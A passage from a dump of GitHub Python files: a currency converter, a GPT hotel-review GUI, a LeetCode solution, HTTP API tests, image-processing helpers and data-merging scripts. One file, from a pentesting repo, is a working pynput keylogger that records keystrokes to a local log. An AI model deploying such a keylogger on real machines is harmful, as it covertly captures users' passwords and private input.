mapa_resultante = armar_mapa(5,5,4,2)\n print(mapa_resultante)","repo_name":"nikoevi87/TP_IA_2020_Dominguez_Marzioni_Rossa","sub_path":"entrega2.py","file_name":"entrega2.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25599450662","text":"import requests\n\ndef convert_gbp_to_usd(amount):\n response = requests.get('https://api.exchangerate-api.com/v4/latest/GBP')\n exchange_rates = response.json()['rates']\n usd_rate = exchange_rates['USD']\n usd_amount = amount * usd_rate\n\n return usd_amount\n\n\npounds = int(input('Enter an amount of pounds: '))\nus_dollars = convert_gbp_to_usd(pounds)\nprint(f'{pounds:.2f} GPB is equivalent to {us_dollars:.2f} USD')\n","repo_name":"zahariev-webbersof/python-fundamentals-05-2023","sub_path":"data_types_and_variables/pounds_to_dollars.py","file_name":"pounds_to_dollars.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"16698463992","text":"import os\nimport openai\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport customtkinter as ctk\nfrom PIL import Image\n\nfrom gpt_reviewer import Analyzer, Review, Scoring\n\nctk.set_appearance_mode(\"System\")\nctk.set_default_color_theme(\"blue\")\n\nheader_label_color = \"#327ab3\"\nheader_font_color = \"#DCE4EE\"\ncontainer_background_color = \"#f0f0f0\"\n\nclass Reviewer(ctk.CTk):\n def __init__(self):\n openai.api_key = os.environ.get(\"OPENAI_API_KEY\")\n\n self.analyzer = Analyzer()\n\n self.hygiene_score = 0\n self.food_score = 0\n self.reception_score = 0\n self.bar_score = 0\n self.other_comments_score = 0\n\n self.create_tk()\n\n def create_tk(self):\n super().__init__()\n\n self.title(\"GPT Reviewer\")\n self.geometry(\"800x1000\")\n\n self.create_frames()\n self.create_widgets()\n\n def create_frames(self):\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=0) # Scoring Frame\n self.grid_rowconfigure(1, weight=8) # Review Frame\n self.grid_rowconfigure(2, weight=1) # Submit Frame\n\n # Scoring Frame\n self.tk_scoring_frame = ctk.CTkFrame(self, corner_radius=0)\n self.tk_scoring_frame.grid(row=0, column=0, sticky=\"nsew\")\n\n # 10 Columns, 2 for each score (Hygiene, Food, Reception, Bar, Other Comments)\n self.tk_scoring_frame.grid_columnconfigure(0, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(1, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(2, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(3, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(4, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(5, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(6, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(7, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(8, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(9, weight=1)\n self.tk_scoring_frame.grid_rowconfigure(0, weight=0)\n self.tk_scoring_frame.grid_rowconfigure(1, weight=0)\n\n # Review Frame\n self.tk_review_frame = ctk.CTkFrame(self, corner_radius=0)\n self.tk_review_frame.grid(row=1, column=0, sticky=\"nsew\")\n\n self.tk_review_frame.grid_columnconfigure(0, weight=1)\n self.tk_review_frame.grid_columnconfigure(1, weight=8)\n self.tk_review_frame.grid_rowconfigure(0, weight=0)\n self.tk_review_frame.grid_rowconfigure(1, weight=1)\n self.tk_review_frame.grid_rowconfigure(2, weight=0)\n self.tk_review_frame.grid_rowconfigure(3, weight=1)\n self.tk_review_frame.grid_rowconfigure(4, weight=0)\n self.tk_review_frame.grid_rowconfigure(5, weight=1)\n self.tk_review_frame.grid_rowconfigure(6, weight=0)\n self.tk_review_frame.grid_rowconfigure(7, weight=1)\n self.tk_review_frame.grid_rowconfigure(8, weight=0)\n self.tk_review_frame.grid_rowconfigure(9, weight=1)\n\n # Submit Frame\n self.tk_submit_frame = ctk.CTkFrame(self, corner_radius=0)\n self.tk_submit_frame.grid(row=2, column=0, sticky=\"nsew\")\n\n self.tk_submit_frame.grid_columnconfigure(0, weight=1)\n self.tk_submit_frame.grid_columnconfigure(1, weight=8)\n self.tk_submit_frame.grid_rowconfigure(0, weight=1)\n\n def create_widgets(self):\n # Scoring Frame\n self.tk_score_hygiene_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Hygiene Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_hygiene_label.grid(row=0, column=0, sticky=\"nsew\", columnspan=2)\n self.tk_score_food_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Food Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_food_label.grid(row=0, column=2, sticky=\"nsew\", columnspan=2)\n self.tk_score_reception_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Reception Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_reception_label.grid(row=0, column=4, sticky=\"nsew\", columnspan=2)\n self.tk_score_bar_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Bar Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_bar_label.grid(row=0, column=6, sticky=\"nsew\", columnspan=2)\n self.tk_score_other_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Other Comments\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_other_label.grid(row=0, column=8, sticky=\"nsew\", columnspan=2)\n\n self.tk_score_hygiene_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/safe.png\"), dark_image=Image.open(\"gui_assets/safe.png\"), size=(60,60))\n self.tk_score_hygiene_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_hygiene_image, text=\"\")\n self.tk_score_hygiene_image_label.grid(row=1, column=0, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_hygiene_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_hygiene_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_hygiene_count_var)\n self.tk_score_hygiene_count_label.grid(row=1, column=1, sticky=\"nsew\")\n\n self.tk_score_food_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/restaurant.png\"), dark_image=Image.open(\"gui_assets/restaurant.png\"), size=(60,60))\n self.tk_score_food_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_food_image, text=\"\")\n self.tk_score_food_image_label.grid(row=1, column=2, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_food_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_food_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_food_count_var)\n self.tk_score_food_count_label.grid(row=1, column=3, sticky=\"nsew\")\n\n self.tk_score_reception_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/reception.png\"), dark_image=Image.open(\"gui_assets/reception.png\"), size=(60,60))\n self.tk_score_reception_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_reception_image, text=\"\")\n self.tk_score_reception_image_label.grid(row=1, column=4, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_reception_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_reception_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_reception_count_var)\n self.tk_score_reception_count_label.grid(row=1, column=5, sticky=\"nsew\")\n\n self.tk_score_bar_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/martini.png\"), dark_image=Image.open(\"gui_assets/martini.png\"), size=(60,60))\n self.tk_score_bar_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_bar_image, text=\"\")\n self.tk_score_bar_image_label.grid(row=1, column=6, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_bar_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_bar_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_bar_count_var)\n self.tk_score_bar_count_label.grid(row=1, column=7, sticky=\"nsew\")\n\n self.tk_score_other_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/more-information.png\"), dark_image=Image.open(\"gui_assets/more-information.png\"), size=(60,60))\n self.tk_score_other_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_other_image, text=\"\")\n self.tk_score_other_image_label.grid(row=1, column=8, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_other_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_other_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_other_count_var)\n self.tk_score_other_count_label.grid(row=1, column=9, sticky=\"nsew\")\n\n self.tk_scoring_frame_separator = ttk.Separator(self.tk_scoring_frame, orient=\"horizontal\")\n self.tk_scoring_frame_separator.grid(row=2, column=0, sticky=\"nsew\", columnspan=10)\n\n # Review Frame\n self.tk_hygiene_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Hygiene Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_hygiene_review_label.grid(row=0, column=0, sticky=\"nsew\")\n self.tk_hygiene_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe the hygiene, maintenance and cleanliness of the hotel.\")\n self.tk_hygiene_review_clarification_label.grid(row=0, column=1, sticky=\"nsew\")\n\n self.tk_hygiene_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_hygiene_review_text.grid(row=1, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_food_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Food Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_food_review_label.grid(row=2, column=0, sticky=\"nsew\")\n self.tk_food_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe the food and restaurant experience.\")\n self.tk_food_review_clarification_label.grid(row=2, column=1, sticky=\"nsew\")\n\n self.tk_food_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_food_review_text.grid(row=3, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_reception_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Reception Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_reception_review_label.grid(row=4, column=0, sticky=\"nsew\")\n self.tk_reception_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe your experience with the reception and service staff.\")\n self.tk_reception_review_clarification_label.grid(row=4, column=1, sticky=\"nsew\")\n\n self.tk_reception_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_reception_review_text.grid(row=5, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_bar_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Bar Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_bar_review_label.grid(row=6, column=0, sticky=\"nsew\")\n self.tk_bar_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe your experience at the bar and other entertainment facilities.\")\n self.tk_bar_review_clarification_label.grid(row=6, column=1, sticky=\"nsew\")\n\n self.tk_bar_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_bar_review_text.grid(row=7, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_other_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Other Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_other_review_label.grid(row=8, column=0, sticky=\"nsew\")\n self.tk_other_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Include any other comments that do not fit in the above categories.\")\n self.tk_other_review_clarification_label.grid(row=8, column=1, sticky=\"nsew\")\n\n self.tk_other_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_other_review_text.grid(row=9, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_review_frame_separator = ttk.Separator(self.tk_review_frame, orient=\"horizontal\")\n self.tk_review_frame_separator.grid(row=10, column=0, sticky=\"nsew\", columnspan=2)\n\n # Submit Frame\n self.tk_submit_button = ctk.CTkButton(self.tk_submit_frame, text=\"Submit\", command=self.submit)\n self.tk_submit_button.grid(row=0, column=0, sticky=\"nsew\", padx=3, pady=3)\n\n self.tk_gpt_comment_text = tk.Text(self.tk_submit_frame, height=3)\n self.tk_gpt_comment_text.grid(row=0, column=1, sticky=\"nsew\")\n\n self.set_feedback_text(\"You will receive feedback on your review here.\")\n\n def set_feedback_text(self, text):\n self.tk_gpt_comment_text.configure(state=\"normal\")\n self.tk_gpt_comment_text.delete(1.0, tk.END)\n self.tk_gpt_comment_text.insert(tk.END, text)\n self.tk_gpt_comment_text.see(tk.END)\n self.tk_gpt_comment_text.configure(state=\"disabled\")\n\n def submit(self):\n review = Review(\n hygiene_review=self.tk_hygiene_review_text.get(\"1.0\", \"end-1c\"),\n food_review=self.tk_food_review_text.get(\"1.0\", \"end-1c\"),\n reception_review=self.tk_reception_review_text.get(\"1.0\", \"end-1c\"),\n bar_review=self.tk_bar_review_text.get(\"1.0\", \"end-1c\"),\n other_comments=self.tk_other_review_text.get(\"1.0\", \"end-1c\")\n )\n\n results = self.analyzer.validate(review)\n\n if results.is_valid:\n new_scoring = self.analyzer.score(review)\n self.change_score(new_scoring)\n\n self.set_feedback_text(\"Thank you for your review!\")\n\n else:\n self.set_feedback_text(results.explanation)\n\n def change_score(self, scores):\n def score_reward(score):\n if score == 1: return -50\n elif score == 2: return -25\n elif score == 3: return 0\n elif score == 4: return 50\n elif score == 5: return 100\n else: return 0\n\n self.hygiene_score += score_reward(scores.hygiene_score)\n self.food_score += score_reward(scores.food_score)\n self.reception_score += score_reward(scores.reception_score)\n self.bar_score += score_reward(scores.bar_score)\n self.other_comments_score += score_reward(scores.other_comments_score)\n\n self.tk_score_hygiene_count_var.set(self.hygiene_score)\n self.tk_score_food_count_var.set(self.food_score)\n self.tk_score_reception_count_var.set(self.reception_score)\n self.tk_score_bar_count_var.set(self.bar_score)\n self.tk_score_other_count_var.set(self.other_comments_score)\n\n\n\nif __name__ == \"__main__\":\n app = Reviewer()\n app.mainloop()\n","repo_name":"Darustc4/gpt-hotel-reviews","sub_path":"gpt_reviewer_gui.py","file_name":"gpt_reviewer_gui.py","file_ext":"py","file_size_in_byte":14040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38283373627","text":"class Solution(object):\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: List[List[int]]\n :rtype: int\n \"\"\"\n w = len(triangle[-1])\n h = len(triangle)\n T = [[None for i in range(w)] for j in range(h)]\n for i in range(h):\n for j in range(i+1):\n if i - 1 < 0:\n T[i][j] = triangle[i][j]\n else:\n if T[i-1][j] == None:\n T[i][j] = triangle[i][j] + T[i-1][j-1]\n elif T[i-1][j-1] == None:\n T[i][j] = triangle[i][j] + T[i-1][j]\n else:\n if T[i-1][j-1] < T[i-1][j]:\n T[i][j] = triangle[i][j] + T[i-1][j-1]\n else:\n T[i][j] = triangle[i][j] + T[i-1][j]\n print(T)\n totalMin = T[-1][0]\n for i in range(len(T[-1])):\n if T[-1][i] < totalMin:\n totalMin = T[-1][i]\n return totalMin\n \n\ns = Solution()\n#r = s.minimumTotal([[2],[3,4],[6,5,7],[4,1,8,3]])\nr = s.minimumTotal([[-8],[3,-6],[5,7,1],[-9,5,0,-4],[-2,4,-1,1,8]])\nprint(r)\n","repo_name":"chengang/leetcode","sub_path":"python/120-Triangle.py","file_name":"120-Triangle.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15779589522","text":"#!/usr/bin/python3\n\nimport pynput\n\ncount =0\nKeys=[]\n\nfrom pynput.keyboard import Key, Listener\n\ndef write_file(Keys):\n with open(\"logs.txt\",\"a\") as f:\n for key in Keys:\n k=str(key).replace(\"'\",\" \")\n\n #Key.space\n if k.find(\"space\") > 0:\n f.write('\\n')\n\n #Key.backspace\n elif k.find(\"Key\") == -1:\n f.write(k)\n\ndef when_pressed(key):\n #print(key, \"was pressed\")\n global count, Keys\n Keys.append(key)\n count = count+1\n if count>=10:\n write_file(Keys)\n Keys=[]\n count=0\n print(\"{0} pressed\".format(key))\n\n\n\n\ndef when_released(key):\n #print(key, \"was released\")\n #print(\"{0} released\".format(key))\n if key == Key.esc:\n return FALSE\n\nwith Listener(on_press=when_pressed, on_release=when_released) as listener: #just replaced it with lower case listener\n listener.join()","repo_name":"Zshader/Python-for-pentesting","sub_path":"Keylogger.py","file_name":"Keylogger.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30200529026","text":"import pytest\nimport requests\nimport json\n\nfrom src.config import url\n\n@pytest.fixture\ndef users():\n requests.delete(url + \"clear/v1\")\n\n global_owner = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"eru.iluvatar@gmail.com\", \"password\": \"123abc!@\", \"name_first\": \"Eru\", \"name_last\": \"Iluvatar\" \n })\n global_owner = global_owner.json()\n\n u1 = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"validemail@gmail.com\", \"password\": \"123abc!@\", \"name_first\": \"Hayden\", \"name_last\": \"Everest\" \n })\n u1 = u1.json()\n\n u2 = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"ANOTHERVALIDEMAIL@gmail.com\", \"password\": \"Hello456abc!@\", \"name_first\": \"Thomas\", \"name_last\": \"Bobson\" \n })\n u2 = u2.json()\n\n u3 = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"harry.potter@gmail.com\", \"password\": \"Harry456abc!@\", \"name_first\": \"Harry\", \"name_last\": \"Potter\" \n })\n u3 = u3.json()\n\n return [u1, u2, u3, global_owner]\n\n@pytest.fixture\ndef channels(users):\n\n dm_1 = requests.post(url + \"dm/create/v1\", json={\n \"token\": users[0][\"token\"], \"u_ids\": [users[1][\"auth_user_id\"]]}).json()\n \n channel_1 = requests.post(url + \"channels/create/v2\", json={\n \"token\": users[0]['token'], \"name\": \"test\", \"is_public\": True\n }).json()\n\n return [dm_1, channel_1]\n\ndef test_user_profile(users):\n profile = requests.get(url + \"user/profile/v2\", params={\"token\": users[0][\"token\"], \"u_id\": users[3][\"auth_user_id\"]}).json()[\"user\"]\n\n assert profile[\"name_first\"] == \"Eru\"\n assert profile[\"name_last\"] == \"Iluvatar\"\n assert profile[\"email\"] == \"eru.iluvatar@gmail.com\"\n assert profile[\"handle_str\"] == \"eruiluvatar\"\n assert profile[\"u_id\"] == users[3][\"auth_user_id\"]\n\ndef test_user_profile_no_exist(users):\n\n assert requests.get(url + \"user/profile/v2\", params={\"token\": users[0][\"token\"], \"u_id\": 42}).status_code == 400\n\n\ndef test_set_name_email_handle(users, channels):\n\n name_first = \"Lelouch\"\n name_last = \"Lamperouge\"\n email = \"lelouch.lamperouge@Britannia.com\"\n handle = \"Zero\"\n\n requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": name_first, \"name_last\": name_last})\n\n requests.put(url + \"user/profile/setemail/v2\", json={\n \"token\": users[0][\"token\"], \"email\": email})\n\n requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": handle})\n \n profile = requests.get(url + \"user/profile/v2\", params={\"token\": users[0][\"token\"], \"u_id\": users[0][\"auth_user_id\"]}).json()[\"user\"]\n\n assert profile[\"name_first\"] == name_first\n assert profile[\"name_last\"] == name_last\n assert profile[\"email\"] == email\n assert profile[\"handle_str\"] == handle\n\n channel_details = requests.get(url + \"channel/details/v2\", params={\n \"token\": users[0]['token'], \"channel_id\": channels[1][\"channel_id\"]\n }).json()\n\n assert channel_details[\"owner_members\"][0][\"email\"] == email\n assert channel_details[\"owner_members\"][0][\"handle_str\"] == handle\n assert channel_details[\"owner_members\"][0][\"name_first\"] == name_first\n assert channel_details[\"owner_members\"][0][\"name_last\"] == name_last\n\n assert channel_details[\"all_members\"][0][\"email\"] == email\n assert channel_details[\"all_members\"][0][\"handle_str\"] == handle\n assert channel_details[\"all_members\"][0][\"name_first\"] == name_first\n assert channel_details[\"all_members\"][0][\"name_last\"] == name_last\n\n\n dm_details = requests.get(url + \"dm/details/v1\", params={\n \"token\": users[0]['token'], \"dm_id\": channels[0][\"dm_id\"]\n }).json()\n\n assert dm_details[\"members\"][0][\"email\"] == email\n assert dm_details[\"members\"][0][\"handle_str\"] == handle\n assert dm_details[\"members\"][0][\"name_first\"] == name_first\n assert dm_details[\"members\"][0][\"name_last\"] == name_last\n\n\ndef test_set_handle_already_in_use(users):\n handle = \"harrypotter\"\n\n assert requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": handle}).status_code == 400\n\ndef test_set_handle_and_name_too_long_or_short(users):\n long_string = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n name_first = \"Lelouch\"\n name_last = \"Lamperouge\"\n\n assert requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": long_string}).status_code == 400\n\n assert requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": \"hi\"}).status_code == 400\n\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": long_string, \"name_last\": name_last}).status_code == 400\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": name_first, \"name_last\": long_string}).status_code == 400\n\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": \"\", \"name_last\": name_last}).status_code == 400\n\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": name_first, \"name_last\": \"\"}).status_code == 400\n\ndef test_set_email_exceptions(users):\n invalid_email = \"wrong$$$Email@gmail.com\"\n used_email = \"eru.iluvatar@gmail.com\"\n\n assert requests.put(url + \"user/profile/setemail/v2\", json={\n \"token\": users[0][\"token\"], \"email\": used_email}).status_code == 400\n\n assert requests.put(url + \"user/profile/setemail/v2\", json={\n \"token\": users[0][\"token\"], \"email\": invalid_email}).status_code == 400\n\n requests.delete(url + \"clear/v1\")\n","repo_name":"Lionel307/Software-engineering-fundamentals","sub_path":"project/http_tests/user_profiles_http_test.py","file_name":"user_profiles_http_test.py","file_ext":"py","file_size_in_byte":5744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70147522386","text":"## Auxiliary routines for image processing algorithms\nimport numpy as np; from numpy.linalg import inv\nimport matplotlib.pyplot as plt; from matplotlib.colors import LinearSegmentedColormap as lscm\n\n#Image presentation\ndef displayImages(images, titles = '', cmp = 'gray', show = True):\n# if type(images) is tuple or type(images) is list: \n if isinstance(images, (tuple, list)): \n number = len(images)\n fig = plt.figure(figsize = (number * 3, 3)); fig.tight_layout()\n for p, (image, title) in enumerate(zip(images, titles)):\n sb = plt.subplot(1, number, p + 1)\n sb.set_xticks([]); sb.set_yticks([])\n plt.title(title); plt.imshow(image, cmap = cmp)\n else:\n sb = plt.subplot(1, 1, 1)\n sb.set_xticks([]); sb.set_yticks([])\n plt.title(titles); plt.imshow(images, cmap = cmp)\n if show: plt.show()\n\ndef displayPlots(plots, titles):\n for p, (pl, ttl) in enumerate(zip(plots, titles)):\n plt.subplot(1, len(plots), p + 1)\n plt.title(ttl); plt.plot(pl)\n plt.show()\n\ndef displayPlotsXY(plots, titles):\n for p, ((x, y), ttl) in enumerate(zip(plots, titles)):\n plt.subplot(1, len(plots), p + 1)\n plt.title(ttl); plt.plot(x, y)\n plt.show()\n\n# Image dissection presentation (the channels and the resulting image)\ndef displayChannels(images, channels, rows = 1, cols = 4, title = 'RGB'):\n for image in images:\n for p, c in enumerate(channels):\n sb = plt.subplot(rows, cols, p + 1)\n sb.set_xticks([]); sb.set_yticks([])\n cmp = lscm.from_list('_', ['black', c])\n plt.title(c); plt.imshow(image[..., p], cmp)\n sb = plt.subplot(rows, cols, rows * cols)\n sb.set_xticks([]); sb.set_yticks([])\n plt.title(title); plt.imshow(image)\n plt.show()\n\n# When you don't care about the return value\ndef splot(*args, scalex = True, scaley = True, data = None, **kwargs): \n _ = plt.plot(*args, scalex = True, scaley = True, data = None, **kwargs)\n\n# CFA filter mask (replication of a single CFA segment into a whole sensor mask)\ndef CFA(masks, X):\n return np.dstack([np.tile(mask, X) for mask in masks])\n\nJPG_QT_Y = [[16, 11, 10, 16, 24, 40, 51, 61],\n [12, 12, 14, 19, 26, 58, 60, 55],\n [14, 13, 16, 24, 40, 57, 69, 56],\n [14, 17, 22, 29, 51, 87, 80, 62],\n [18, 22, 37, 56, 68, 109, 103, 77],\n [24, 35, 55, 64, 81, 104, 113, 92],\n [49, 64, 78, 87, 103, 121, 120, 101],\n [72, 92, 95, 98, 112, 100, 103, 99]]\n\nJPG_QT_CbCr = [[17, 18, 24, 47, 99, 99, 99, 99], \n [18, 21, 26, 66, 99, 99, 99, 99], \n [24, 26, 56, 99, 99, 99, 99, 99], \n [47, 66, 99, 99, 99, 99, 99, 99], \n [99, 99, 99, 99, 99, 99, 99, 99],\n [99, 99, 99, 99, 99, 99, 99, 99], \n [99, 99, 99, 99, 99, 99, 99, 99], \n [99, 99, 99, 99, 99, 99, 99, 99]]\n\n## Irréversible Color Transform (ICT)\nRGB2YCbCr = [[ .299, .587, .114],\n [-.168736, -.331264, .5],\n [ .5, -.418688, -.081312]]\nYCbCr2RGB = inv(np.array(RGB2YCbCr))\n\n## Reversible Color Transform (RCT)\ndef RCT(R, G, B): \n Y, Cb, Cr = int(np.floor((R + 2*G + B)/4)), B - G, R - G\n return (Y, Cb, Cr)\n\ndef invRCT(Y, Cb, Cr): \n G = Y - int(np.floor((Cb + Cr)/4))\n R, B = Cr + G, Cb + G\n return (R, G, B)\n\n\n## A decorative fun... See: https://www.geeksforgeeks.org/decorators-in-python/\nfrom time import time as TT\ndef ITT(f):\n\tdef time_warper_wrapper(*args, **kwargs): \n\t\tbegin = TT() # from time import time as TT\n\t\tr = f(*args, **kwargs) \n\t\tend = TT()\n\t\tprint(f'{f.__name__} evaluated in {round(end - begin)}s')\n\t\treturn r\n\treturn time_warper_wrapper\n\n\n","repo_name":"Bahrd/AppliedPythonology","sub_path":"auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"14798113495","text":"from random import randint\n\nfrom field_space import FieldSpace\nfrom name_source import next_name\n\ndef random_field_space(task_name, settings):\n name = next_name('field_space')\n num_fields = randint(1, settings.max_fields)\n field_ids = []\n for i in xrange(num_fields):\n field_ids.append(name + '_' + str(i))\n return FieldSpace(name, task_name, field_ids)\n","repo_name":"dillonhuff/test_gen","sub_path":"generator/rand_field_space.py","file_name":"rand_field_space.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40915630232","text":"import os\nimport pandas as pd\n\n\n\nimport pandas as pd\nimport os\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\ncols = ['0|Objecten:Verblijfsobject|Objecten:identificatie','x','y']\ndf_list = []\nfinal_df = pd.DataFrame()\ndf_append = pd.DataFrame()\n# for filename in os.listdir():\n# if filename.endswith(\".csv\"):\n# df = pd.read_csv(filename)\n# df = df.drop_duplicates(subset='0|Objecten:Verblijfsobject|Objecten:identificatie', keep='last')\n# df = df[cols]\n# df_list.append(df)\npath = os.path.dirname(os.path.realpath(__file__))\nfor i in range(1,2170):\n file = \"verblijfsplaatsen{:01d}.csv\".format(i)\n print(f'Bezig met {file}')\n df_temp = pd.read_csv(f'{path}/{file}')\n df_temp = df_temp[cols]\n df_append = df_append.append(df_temp, ignore_index = True)\n print('Row count is:', len(df_append.axes[0]))\n\ndf_append = df_append.drop_duplicates(subset='0|Objecten:Verblijfsobject|Objecten:identificatie', keep='last')\nfile = \"verblijfplaatsen_longer.csv\"\ndf_append.to_csv(f\"{path}/{file}\")\nprint('Row count is:', len(df_append.axes[0]))\nprint(\"concatenating done!\")","repo_name":"S127-Pi/rainwater_damage","sub_path":"BAG/read_xml_scripts/data/csv/merge_csv.py","file_name":"merge_csv.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34930624880","text":"import glob, os\nimport numpy as np\n\nfiles = []\nwith open(\"stimuli_list.txt\", \"r\") as f:\n files = f.readlines()\n# print(files)\n\nos.chdir(\"/scratch/CSAI/image_feature/InceptionV3/train\")\n# path = \"/scratch/CSAI/image_feature/InceptionV3/train\"\npath = \".\"\n\n\n# print(os.getcwd())\n\nfor layer in [248, 279, 310, -1]:\n print(layer)\n patht = path + \"/\" + str(layer)\n values = {}\n # values[layer] = {}\n # print(patht)\n # print(os.listdir(patht))\n\n file_list = os.listdir(patht)\n # print(file_list)\n # print(os.getcwd())\n for line in files:\n if \"COCO\" in line:\n # print(line)\n if (str(line.split(\"\\n\")[0])+\".npy\") in file_list:\n # print(line, line+\".npy\")\n id = int(line.split(\"\\n\")[0].split(\"_\")[2].split(\".\")[0])\n # print(id)\n values[id] = np.load(str(layer)+\"/\"+line.split(\"\\n\")[0]+\".npy\", allow_pickle=True)\n print(len(values.keys()))\n # print(values[layer].keys())\n # for filename in os.listdir(patht):\n # if(filename.slit(\"_\")[0] == \"COCO\"):\n # if \".\".join(filename.split(\"/\")[-1].split(\".\")[:-1]) in files:\n # 